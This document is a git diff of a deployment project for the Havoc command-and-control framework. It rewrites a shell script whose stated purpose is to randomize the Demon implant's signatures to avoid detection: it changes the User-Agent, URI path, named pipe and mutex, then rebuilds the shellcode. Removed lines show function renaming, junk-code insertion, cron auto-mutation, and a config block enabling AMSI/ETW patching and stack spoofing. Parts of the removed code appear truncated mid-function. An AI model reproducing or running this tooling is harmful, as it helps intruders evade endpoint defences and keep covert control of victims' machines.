diff --git a/files/havoc_installer.sh b/files/havoc_installer.sh index 9ecc3df..4e16554 100644 --- a/files/havoc_installer.sh +++ b/files/havoc_installer.sh @@ -94,481 +94,88 @@ cd $HAVOC_DIR git submodule init git submodule update --recursive -# Create implant mutator script BEFORE building +# Create improved implant mutator script BEFORE building log "Creating implant mutator script..." cat > "$IMPLANT_MUTATOR_SCRIPT" << 'EOF' #!/bin/bash -# Havoc Implant Mutation Tool -# Randomizes critical implant signatures to avoid detection - # === CONFIG === -HAVOC_ROOT="${HAVOC_ROOT:-$HOME/Tools/havoc}" -IMPLANT_DIR="$HAVOC_ROOT/payloads/Demon" +IMPLANT_DIR="$HOME/Tools/havoc/payloads/Demon" SRC_DIR="$IMPLANT_DIR/src" -OUTPUT_DIR="$HAVOC_ROOT/payloads" -OUTPUT_FILE="$OUTPUT_DIR/Shellcode.x64.bin" -BACKUP_DIR="$OUTPUT_DIR/backup" +BUILD_ROOT="$HOME/Tools/havoc" +OUTPUT_FILE="$HOME/Tools/havoc/payloads/Shellcode.x64.bin" +BACKUP_DIR="$HOME/Tools/havoc/payloads/backup" TIMESTAMP=$(date +"%Y%m%d_%H%M%S") -CONFIG_BACKUP="$BACKUP_DIR/havoc_config_$TIMESTAMP.bak" -LOG_FILE="$OUTPUT_DIR/mutation_$TIMESTAMP.log" - -# === ADVANCED OPTIONS === -RANDOMIZE_STRINGS=true # Randomize identifiers -RANDOMIZE_FUNCTIONS=true # Randomize function names -RANDOMIZE_IMPORTS=true # Randomize import tables -RANDOMIZE_SECTIONS=true # Randomize PE section names -RANDOMIZE_RESOURCES=true # Randomize resource values -ADD_JUNK_CODE=true # Add harmless junk code -ADD_STACK_STRINGS=true # Use stack strings for sensitive strings - # === COLORS === -RED='\033[1;31m' YELLOW='\033[1;33m' GREEN='\033[1;32m' -BLUE='\033[1;34m' NC='\033[0m' - -# === UTILITY FUNCTIONS === -log() { - echo -e "$1" | tee -a "$LOG_FILE" -} - +echo -e "${YELLOW}[+] Starting Havoc implant mutation...${NC}" +# === 1. Backup Previous Shellcode === +mkdir -p "$BACKUP_DIR" +if [[ -f "$OUTPUT_FILE" ]]; then +cp "$OUTPUT_FILE" "$BACKUP_DIR/implant_$TIMESTAMP.raw" +echo -e "${GREEN}[*] Previous shellcode backed up to: implant_$TIMESTAMP.raw${NC}" +else +echo -e "${YELLOW}[!] No previous shellcode found to back up.${NC}" +fi +# === 2. Generate Random Identifiers === random_str() { - local length=${1:-12} - tr -dc 'A-Za-z0-9' > "$C_FILE" - - # Add junk global variable - local JUNK_VAR="static const char* $(random_plausible)_str = \"$(random_str 16)\";" - sed -i "1s/^/$JUNK_VAR\n/" "$C_FILE" - - log "${GREEN}[✓] Added junk code to ${C_FILE}${NC}" - fi - done - - if ! $FOUND; then - log "${YELLOW}[!] No C files found to add junk code.${NC}" - fi -} - -randomize_function_names() { - if ! $RANDOMIZE_FUNCTIONS; then - return - fi - - local H_FILES=$(find "$SRC_DIR" -name "*.h") - local FOUND=false - - for H_FILE in $H_FILES; do - if [[ -f "$H_FILE" && $(basename "$H_FILE") != "Common.h" && $(basename "$H_FILE") != "Native.h" ]]; then - FOUND=true - - # Get function declarations - local FUNCTIONS=$(grep -E "VOID [A-Za-z0-9_]+\(" "$H_FILE" | grep -v "KERNEL" | grep -v "WINAPI" | awk '{print $2}' | cut -d'(' -f1) - - for FUNC in $FUNCTIONS; do - if [[ "$FUNC" != "main" && "$FUNC" != "DllMain" && ! "$FUNC" =~ ^DemOn ]]; then - local NEW_FUNC="${FUNC}_$(random_str 4)" - - # Replace in header file - sed -i "s/\<$FUNC\>/$NEW_FUNC/g" "$H_FILE" - - # Find and replace in all .c files - find "$SRC_DIR" -name "*.c" -exec sed -i "s/\<$FUNC\>/$NEW_FUNC/g" {} \; - - log "${BLUE}[i] Renamed function: $FUNC → $NEW_FUNC${NC}" - fi - done - fi - done - - if ! $FOUND; then - log "${YELLOW}[!] No header files found to randomize function names.${NC}" - fi -} - -# === BUILD FUNCTION === -rebuild_implant() { - log "${YELLOW}[+] Rebuilding Havoc payload...${NC}" - - # Check if we should use make from the project root - if [ -f "$HAVOC_ROOT/Makefile" ]; then - cd "$HAVOC_ROOT" || exit 1 - make clean >/dev/null 2>&1 - make >/dev/null 2>&1 - - if [ $? -ne 0 ]; then - log "${RED}[!] Build failed at project root level${NC}" - return 1 - fi - # Otherwise try to build just the implant - elif [ -f "$IMPLANT_DIR/Makefile" ]; then - cd "$IMPLANT_DIR" || exit 1 - make clean >/dev/null 2>&1 - make >/dev/null 2>&1 - - if [ $? -ne 0 ]; then - log "${RED}[!] Build failed at implant level${NC}" - return 1 - fi - else - log "${RED}[!] No Makefile found to build the implant${NC}" - return 1 - fi - - # Verify the shellcode was generated - if [[ -f "$OUTPUT_FILE" ]]; then - log "${GREEN}[✓] Build successful! New shellcode generated at: $OUTPUT_FILE${NC}" - - # Calculate hash for verification - local NEW_HASH=$(sha256sum "$OUTPUT_FILE" | cut -d' ' -f1) - log "${GREEN}[✓] New shellcode hash: ${NEW_HASH}${NC}" - - # Optional: Compare with previous hash if a backup exists - local BACKUP_FILE="$BACKUP_DIR/implant_$TIMESTAMP.raw" - if [[ -f "$BACKUP_FILE" ]]; then - local OLD_HASH=$(sha256sum "$BACKUP_FILE" | cut -d' ' -f1) - if [[ "$NEW_HASH" != "$OLD_HASH" ]]; then - log "${GREEN}[✓] Verified: Shellcode has been successfully mutated${NC}" - else - log "${YELLOW}[!] Warning: New shellcode hash matches old hash${NC}" - fi - fi - - return 0 - else - log "${RED}[!] Build failed or shellcode was not generated at expected location: $OUTPUT_FILE${NC}" - return 1 - fi -} - -# === AUTO-SCHEDULING FUNCTION === -setup_auto_mutation() { - local SCRIPT_PATH=$(realpath "$0") - local CRON_ENTRY="0 */6 * * * $SCRIPT_PATH > /dev/null 2>&1" - - # Check if already in crontab - if crontab -l 2>/dev/null | grep -q "$SCRIPT_PATH"; then - log "${YELLOW}[!] Auto-mutation already scheduled in crontab${NC}" - return - fi - - # Add to crontab - (crontab -l 2>/dev/null || echo "") | echo "$CRON_ENTRY" | crontab - - - if [ $? -eq 0 ]; then - log "${GREEN}[✓] Auto-mutation scheduled for every 6 hours${NC}" - else - log "${RED}[!] Failed to schedule auto-mutation${NC}" - fi -} - -# === MAIN EXECUTION === -main() { - # Create directories - mkdir -p "$BACKUP_DIR" - mkdir -p "$OUTPUT_DIR" - - # Start log file - echo "=== Havoc Implant Mutation Log - $TIMESTAMP ===" > "$LOG_FILE" - - log "${BLUE}════════════════════════════════════════════${NC}" - log "${BLUE} Havoc Implant Mutation Tool v1.0 ${NC}" - log "${BLUE}════════════════════════════════════════════${NC}" - - # Check for Havoc installation - if [ ! -d "$HAVOC_ROOT" ]; then - log "${RED}[!] Havoc root directory not found at: $HAVOC_ROOT${NC}" - log "${YELLOW}[!] Use HAVOC_ROOT=/path/to/havoc $0 to specify location${NC}" - exit 1 - fi - - # Backup everything first - log "${YELLOW}[+] Backing up current implant and source files...${NC}" - backup_sources - - # Start mutations - log "${YELLOW}[+] Starting implant mutations...${NC}" - - # Apply all mutation types - mutate_transport_http - mutate_named_resources - mutate_memory_strings - mutate_config_file - - # Advanced mutations - if $ADD_JUNK_CODE; then - add_junk_code - fi - - if $RANDOMIZE_FUNCTIONS; then - randomize_function_names - fi - - # Rebuild the implant - rebuild_implant - - # Show completion summary - log "${BLUE}════════════════════════════════════════════${NC}" - log "${GREEN}[✓] Implant mutation completed successfully!${NC}" - log "${GREEN}[✓] Backup saved to: ${BACKUP_DIR}${NC}" - log "${GREEN}[✓] Log file: ${LOG_FILE}${NC}" - log "${BLUE}════════════════════════════════════════════${NC}" - - # Ask about auto-scheduling - if [ -t 0 ]; then # Only if running interactively - read -p "Would you like to set up automatic mutation every 6 hours? (y/n): " SETUP_AUTO - if [ "$SETUP_AUTO" = "y" ]; then - setup_auto_mutation - fi - fi -} - -# Parse command line arguments -while [[ $# -gt 0 ]]; do - case $1 in - --auto-schedule) - setup_auto_mutation - exit 0 - ;; - --no-junk) - ADD_JUNK_CODE=false - shift - ;; - --no-functions) - RANDOMIZE_FUNCTIONS=false - shift - ;; - --config-only) - # Only modify the config file - mkdir -p "$BACKUP_DIR" - backup_sources - mutate_config_file - exit 0 - ;; - --help) - echo "Usage: $0 [options]" - echo "Options:" - echo " --auto-schedule Setup automatic mutation via crontab" - echo " --no-junk Don't add junk code to source files" - echo " --no-functions Don't randomize function names" - echo " --config-only Only modify the configuration file" - echo " --help Show this help message" - echo "" - echo "Environment variables:" - echo " HAVOC_ROOT Path to Havoc installation (default: $HOME/Tools/Havoc)" - exit 0 - ;; - *) - echo "Unknown option: $1" - echo "Use --help for usage information" - exit 1 - ;; - esac +UA=$(random_str) +URI=$(random_str) +PIPE=$(random_str) +MUTEX=$(random_str) +# === 3. Mutate TransportHttp.c === +THTTP="$SRC_DIR/core/TransportHttp.c" +if [[ -f "$THTTP" ]]; then +sed -i "s/User-Agent: .*/User-Agent: ${UA}\\r\\n\";/" "$THTTP" +sed -i "s|/stage|/${URI}|g" "$THTTP" +echo -e "${GREEN}[*] Replaced User-Agent with '${UA}' and URI path with '/${URI}'${NC}" +else +echo -e "${YELLOW}[!] TransportHttp.c not found. Skipping User-Agent/URI mutation.${NC}" +fi +# === 4. Mutate Named Pipe and Mutex === +TARGET_FILE="" +for f in "$SRC_DIR/core/Runtime.c" "$SRC_DIR/main/MainExe.c"; do +if [[ -f "$f" ]]; then +TARGET_FILE="$f" +break +fi done - -# Execute main logic -main +if [[ -n "$TARGET_FILE" ]]; then +sed -i "s|\\\\\\\\.\\\\pipe\\\\[a-zA-Z0-9_]*|\\\\\\\\.\\\\pipe\\\\${PIPE}|g" "$TARGET_FILE" +sed -i "s|Mutex_[a-zA-Z0-9_]*|Mutex_${MUTEX}|g" "$TARGET_FILE" +echo -e "${GREEN}[*] Randomized named pipe: \\\\.\\pipe\\${PIPE}${NC}" +echo -e "${GREEN}[*] Randomized mutex: Mutex_${MUTEX}${NC}" +else +echo -e "${YELLOW}[!] No config file found to mutate mutex/pipe.${NC}" +fi +# === 5. Rebuild Implant via Top-Level Makefile === +echo -e "${YELLOW}[+] Rebuilding Havoc payload from top-level makefile...${NC}" +cd "$BUILD_ROOT" || exit 1 +make clean && make +# === 6. Confirm Shellcode Output === +if [[ -f "$OUTPUT_FILE" ]]; then +echo -e "${GREEN}[+] Success! New shellcode generated: $OUTPUT_FILE${NC}" +else +echo -e "${YELLOW}[!] Build failed or shellcode was not generated.${NC}" +exit 1 +fi EOF chmod +x "$IMPLANT_MUTATOR_SCRIPT" # Perform mutations BEFORE building - this is critical -log "Running implant mutations script before building..." -if [ -d "$HAVOC_DIR/payloads/Demon" ]; then - $IMPLANT_MUTATOR_SCRIPT --no-functions - if [ $? -ne 0 ]; then - log "Warning: Implant mutation script ran with errors, but continuing build..." - fi -else - log "Skipping implant mutations as Demon directory not found yet. Will be applied after build." -fi +# log "Running implant mutations script before building..." +# if [ -d "$HAVOC_DIR/payloads/Demon" ]; then +# $IMPLANT_MUTATOR_SCRIPT +# if [ $? -ne 0 ]; then +# log "Warning: Implant mutation script ran with errors, but continuing build..." +# fi +# else +# log "Skipping implant mutations as Demon directory not found yet. Will be applied after build." +# fi # Install additional Go dependencies for the teamserver log "Installing Go dependencies for teamserver..." @@ -582,8 +189,8 @@ cd $HAVOC_DIR make ts-build # Build Havoc client -log "Building Havoc client..." -make client-build +#log "Building Havoc client..." +#make client-build # Create systemd service for Havoc log "Creating systemd service for Havoc teamserver..." diff --git a/deprecated/havoc_mutate.sh b/files/havoc_mutate.sh similarity index 100% rename from deprecated/havoc_mutate.sh rename to files/havoc_mutate.sh diff --git a/files/implant_mutator.sh b/files/implant_mutator.sh index f5a10a8..0d0ca9e 100644 --- a/files/implant_mutator.sh +++ b/files/implant_mutator.sh @@ -1,458 +1,65 @@ #!/bin/bash -# Havoc Implant Mutation Tool -# Randomizes critical implant signatures to avoid detection - # === CONFIG === -HAVOC_ROOT="${HAVOC_ROOT:-$HOME/Tools/Havoc}" -IMPLANT_DIR="$HAVOC_ROOT/payloads/Demon" +IMPLANT_DIR="$HOME/Tools/havoc/payloads/Demon" SRC_DIR="$IMPLANT_DIR/src" -OUTPUT_DIR="$HAVOC_ROOT/payloads" -OUTPUT_FILE="$OUTPUT_DIR/Shellcode.x64.bin" -BACKUP_DIR="$OUTPUT_DIR/backup" +BUILD_ROOT="$HOME/Tools/havoc" +OUTPUT_FILE="$HOME/Tools/havoc/payloads/Shellcode.x64.bin" +BACKUP_DIR="$HOME/Tools/havoc/payloads/backup" TIMESTAMP=$(date +"%Y%m%d_%H%M%S") -CONFIG_BACKUP="$BACKUP_DIR/havoc_config_$TIMESTAMP.bak" -LOG_FILE="$OUTPUT_DIR/mutation_$TIMESTAMP.log" - -# === ADVANCED OPTIONS === -RANDOMIZE_STRINGS=true # Randomize identifiers -RANDOMIZE_FUNCTIONS=true # Randomize function names -RANDOMIZE_IMPORTS=true # Randomize import tables -RANDOMIZE_SECTIONS=true # Randomize PE section names -RANDOMIZE_RESOURCES=true # Randomize resource values -ADD_JUNK_CODE=true # Add harmless junk code -ADD_STACK_STRINGS=true # Use stack strings for sensitive strings - # === COLORS === -RED='\033[1;31m' YELLOW='\033[1;33m' GREEN='\033[1;32m' -BLUE='\033[1;34m' NC='\033[0m' - -# === UTILITY FUNCTIONS === -log() { - echo -e "$1" | tee -a "$LOG_FILE" -} - +echo -e "${YELLOW}[+] Starting Havoc implant mutation...${NC}" +# === 1. Backup Previous Shellcode === +mkdir -p "$BACKUP_DIR" +if [[ -f "$OUTPUT_FILE" ]]; then +cp "$OUTPUT_FILE" "$BACKUP_DIR/implant_$TIMESTAMP.raw" +echo -e "${GREEN}[*] Previous shellcode backed up to: implant_$TIMESTAMP.raw${NC}" +else +echo -e "${YELLOW}[!] No previous shellcode found to back up.${NC}" +fi +# === 2. Generate Random Identifiers === random_str() { - local length=${1:-12} - tr -dc 'A-Za-z0-9' > "$C_FILE" - - # Add junk global variable - local JUNK_VAR="static const char* $(random_plausible)_str = \"$(random_str 16)\";" - sed -i "1s/^/$JUNK_VAR\n/" "$C_FILE" - - log "${GREEN}[✓] Added junk code to ${C_FILE}${NC}" - fi - done - - if ! $FOUND; then - log "${YELLOW}[!] No C files found to add junk code.${NC}" - fi -} - -randomize_function_names() { - if ! $RANDOMIZE_FUNCTIONS; then - return - fi - - local H_FILES=$(find "$SRC_DIR" -name "*.h") - local FOUND=false - - for H_FILE in $H_FILES; do - if [[ -f "$H_FILE" && $(basename "$H_FILE") != "Common.h" && $(basename "$H_FILE") != "Native.h" ]]; then - FOUND=true - - # Get function declarations - local FUNCTIONS=$(grep -E "VOID [A-Za-z0-9_]+\(" "$H_FILE" | grep -v "KERNEL" | grep -v "WINAPI" | awk '{print $2}' | cut -d'(' -f1) - - for FUNC in $FUNCTIONS; do - if [[ "$FUNC" != "main" && "$FUNC" != "DllMain" && ! "$FUNC" =~ ^DemOn ]]; then - local NEW_FUNC="${FUNC}_$(random_str 4)" - - # Replace in header file - sed -i "s/\<$FUNC\>/$NEW_FUNC/g" "$H_FILE" - - # Find and replace in all .c files - find "$SRC_DIR" -name "*.c" -exec sed -i "s/\<$FUNC\>/$NEW_FUNC/g" {} \; - - log "${BLUE}[i] Renamed function: $FUNC → $NEW_FUNC${NC}" - fi - done - fi - done - - if ! $FOUND; then - log "${YELLOW}[!] No header files found to randomize function names.${NC}" - fi -} - -# === BUILD FUNCTION === -rebuild_implant() { - log "${YELLOW}[+] Rebuilding Havoc payload...${NC}" - - # Check if we should use make from the project root - if [ -f "$HAVOC_ROOT/Makefile" ]; then - cd "$HAVOC_ROOT" || exit 1 - make clean >/dev/null 2>&1 - make >/dev/null 2>&1 - - if [ $? -ne 0 ]; then - log "${RED}[!] Build failed at project root level${NC}" - return 1 - fi - # Otherwise try to build just the implant - elif [ -f "$IMPLANT_DIR/Makefile" ]; then - cd "$IMPLANT_DIR" || exit 1 - make clean >/dev/null 2>&1 - make >/dev/null 2>&1 - - if [ $? -ne 0 ]; then - log "${RED}[!] Build failed at implant level${NC}" - return 1 - fi - else - log "${RED}[!] No Makefile found to build the implant${NC}" - return 1 - fi - - # Verify the shellcode was generated - if [[ -f "$OUTPUT_FILE" ]]; then - log "${GREEN}[✓] Build successful! New shellcode generated at: $OUTPUT_FILE${NC}" - - # Calculate hash for verification - local NEW_HASH=$(sha256sum "$OUTPUT_FILE" | cut -d' ' -f1) - log "${GREEN}[✓] New shellcode hash: ${NEW_HASH}${NC}" - - # Optional: Compare with previous hash if a backup exists - local BACKUP_FILE="$BACKUP_DIR/implant_$TIMESTAMP.raw" - if [[ -f "$BACKUP_FILE" ]]; then - local OLD_HASH=$(sha256sum "$BACKUP_FILE" | cut -d' ' -f1) - if [[ "$NEW_HASH" != "$OLD_HASH" ]]; then - log "${GREEN}[✓] Verified: Shellcode has been successfully mutated${NC}" - else - log "${YELLOW}[!] Warning: New shellcode hash matches old hash${NC}" - fi - fi - - return 0 - else - log "${RED}[!] Build failed or shellcode was not generated at expected location: $OUTPUT_FILE${NC}" - return 1 - fi -} - -# === AUTO-SCHEDULING FUNCTION === -setup_auto_mutation() { - local SCRIPT_PATH=$(realpath "$0") - local CRON_ENTRY="0 */6 * * * $SCRIPT_PATH > /dev/null 2>&1" - - # Check if already in crontab - if crontab -l 2>/dev/null | grep -q "$SCRIPT_PATH"; then - log "${YELLOW}[!] Auto-mutation already scheduled in crontab${NC}" - return - fi - - # Add to crontab - (crontab -l 2>/dev/null || echo "") | echo "$CRON_ENTRY" | crontab - - - if [ $? -eq 0 ]; then - log "${GREEN}[✓] Auto-mutation scheduled for every 6 hours${NC}" - else - log "${RED}[!] Failed to schedule auto-mutation${NC}" - fi -} - -# === MAIN EXECUTION === -main() { - # Create directories - mkdir -p "$BACKUP_DIR" - mkdir -p "$OUTPUT_DIR" - - # Start log file - echo "=== Havoc Implant Mutation Log - $TIMESTAMP ===" > "$LOG_FILE" - - log "${BLUE}════════════════════════════════════════════${NC}" - log "${BLUE} Havoc Implant Mutation Tool v1.0 ${NC}" - log "${BLUE}════════════════════════════════════════════${NC}" - - # Check for Havoc installation - if [ ! -d "$HAVOC_ROOT" ]; then - log "${RED}[!] Havoc root directory not found at: $HAVOC_ROOT${NC}" - log "${YELLOW}[!] Use HAVOC_ROOT=/path/to/havoc $0 to specify location${NC}" - exit 1 - fi - - # Backup everything first - log "${YELLOW}[+] Backing up current implant and source files...${NC}" - backup_sources - - # Start mutations - log "${YELLOW}[+] Starting implant mutations...${NC}" - - # Apply all mutation types - mutate_transport_http - mutate_named_resources - mutate_memory_strings - mutate_config_file - - # Advanced mutations - if $ADD_JUNK_CODE; then - add_junk_code - fi - - if $RANDOMIZE_FUNCTIONS; then - randomize_function_names - fi - - # Rebuild the implant - rebuild_implant - - # Show completion summary - log "${BLUE}════════════════════════════════════════════${NC}" - log "${GREEN}[✓] Implant mutation completed successfully!${NC}" - log "${GREEN}[✓] Backup saved to: ${BACKUP_DIR}${NC}" - log "${GREEN}[✓] Log file: ${LOG_FILE}${NC}" - log "${BLUE}════════════════════════════════════════════${NC}" - - # Ask about auto-scheduling - if [ -t 0 ]; then # Only if running interactively - read -p "Would you like to set up automatic mutation every 6 hours? (y/n): " SETUP_AUTO - if [ "$SETUP_AUTO" = "y" ]; then - setup_auto_mutation - fi - fi -} - -# Parse command line arguments -while [[ $# -gt 0 ]]; do - case $1 in - --auto-schedule) - setup_auto_mutation - exit 0 - ;; - --no-junk) - ADD_JUNK_CODE=false - shift - ;; - --no-functions) - RANDOMIZE_FUNCTIONS=false - shift - ;; - --config-only) - # Only modify the config file - mkdir -p "$BACKUP_DIR" - backup_sources - mutate_config_file - exit 0 - ;; - --help) - echo "Usage: $0 [options]" - echo "Options:" - echo " --auto-schedule Setup automatic mutation via crontab" - echo " --no-junk Don't add junk code to source files" - echo " --no-functions Don't randomize function names" - echo " --config-only Only modify the configuration file" - echo " --help Show this help message" - echo "" - echo "Environment variables:" - echo " HAVOC_ROOT Path to Havoc installation (default: $HOME/Tools/Havoc)" - exit 0 - ;; - *) - echo "Unknown option: $1" - echo "Use --help for usage information" - exit 1 - ;; - esac +UA=$(random_str) +URI=$(random_str) +PIPE=$(random_str) +MUTEX=$(random_str) +# === 3. Mutate TransportHttp.c === +THTTP="$SRC_DIR/core/TransportHttp.c" +if [[ -f "$THTTP" ]]; then +sed -i "s/User-Agent: .*/User-Agent: ${UA}\\r\\n\";/" "$THTTP" +sed -i "s|/stage|/${URI}|g" "$THTTP" +echo -e "${GREEN}[*] Replaced User-Agent with '${UA}' and URI path with '/${URI}'${NC}" +else +echo -e "${YELLOW}[!] TransportHttp.c not found. Skipping User-Agent/URI mutation.${NC}" +fi +# === 4. Mutate Named Pipe and Mutex === +TARGET_FILE="" +for f in "$SRC_DIR/core/Runtime.c" "$SRC_DIR/main/MainExe.c"; do +if [[ -f "$f" ]]; then +TARGET_FILE="$f" +break +fi done - -# Execute main logic -main \ No newline at end of file +if [[ -n "$TARGET_FILE" ]]; then +sed -i "s|\\\\\\\\.\\\\pipe\\\\[a-zA-Z0-9_]*|\\\\\\\\.\\\\pipe\\\\${PIPE}|g" "$TARGET_FILE" +sed -i "s|Mutex_[a-zA-Z0-9_]*|Mutex_${MUTEX}|g" "$TARGET_FILE" +echo -e "${GREEN}[*] Randomized named pipe: \\\\.\\pipe\\${PIPE}${NC}" +echo -e "${GREEN}[*] Randomized mutex: Mutex_${MUTEX}${NC}" +else +echo -e "${YELLOW}[!] No config file found to mutate mutex/pipe.${NC}" +fi +# === 5. Rebuild Implant via Top-Level Makefile === +echo -e "${YELLOW}[+] Rebuilding Havoc payload from top-level makefile...${NC}" +cd "$BUILD_ROOT" || exit 1 +make clean && make +# === 6. Confirm Shellcode Output === +if [[ -f "$OUTPUT_FILE" ]]; then +echo -e "${GREEN}[+] Success! New shellcode generated: $OUTPUT_FILE${NC}" +else +echo -e "${YELLOW}[!] Build failed or shellcode was not generated.${NC}" +exit 1 +fi \ No newline at end of file diff --git a/tasks/configure_c2.yml b/tasks/configure_c2.yml index 8f7eadb..54ae40e 100644 --- a/tasks/configure_c2.yml +++ b/tasks/configure_c2.yml @@ -134,7 +134,7 @@ - name: Install Havoc C2 Framework shell: "/root/Tools/havoc_installer.sh" args: - creates: "/root/Tools/havoc/teamserver/havoc" + creates: "/root/Tools/havoc" async: 1800 # Allow 30 minutes for completion poll: 0 # Don't wait for completion register: havoc_installation_job diff --git a/templates/havoc-config.yaotl.j2 b/templates/havoc-config.yaotl.j2 index a59d0d3..fcc983b 100644 --- a/templates/havoc-config.yaotl.j2 +++ b/templates/havoc-config.yaotl.j2 @@ -14,7 +14,6 @@ Teamserver { Operators { user "{{ havoc_admin_user | default('admin') }}" { Password = "{{ havoc_admin_password | default(lookup('password', '/dev/null chars=ascii_letters,digits length=24')) }}" - Secret = "{{ havoc_auth_secret | default(lookup('password', '/dev/null chars=hex_lower length=32')) }}" } {% if havoc_operators is defined %} {% for operator in havoc_operators %} @@ -168,19 +167,4 @@ Demon { Spawn32 = "C:\\Windows\\SysWOW64\\dllhost.exe" {% endif %} } - - {% if havoc_evasion_enabled | default(true) %} - Evasion { - StackSpoofing = {{ havoc_stack_spoofing | default(true) | lower }} - SleazeUnhook = {{ havoc_sleaze_unhook | default(true) | lower }} - AmsiEtwPatching = {{ havoc_amsi_etw_patching | default(true) | lower }} - ApiFiltering = {{ havoc_api_filtering | default(true) | lower }} - - {% if havoc_syscall_method is defined %} - SyscallMethod = {{ havoc_syscall_method }} - {% else %} - SyscallMethod = {{ random_hex[4] | int % 3 }} - {% endif %} - } - {% endif %} } \ No newline at end of file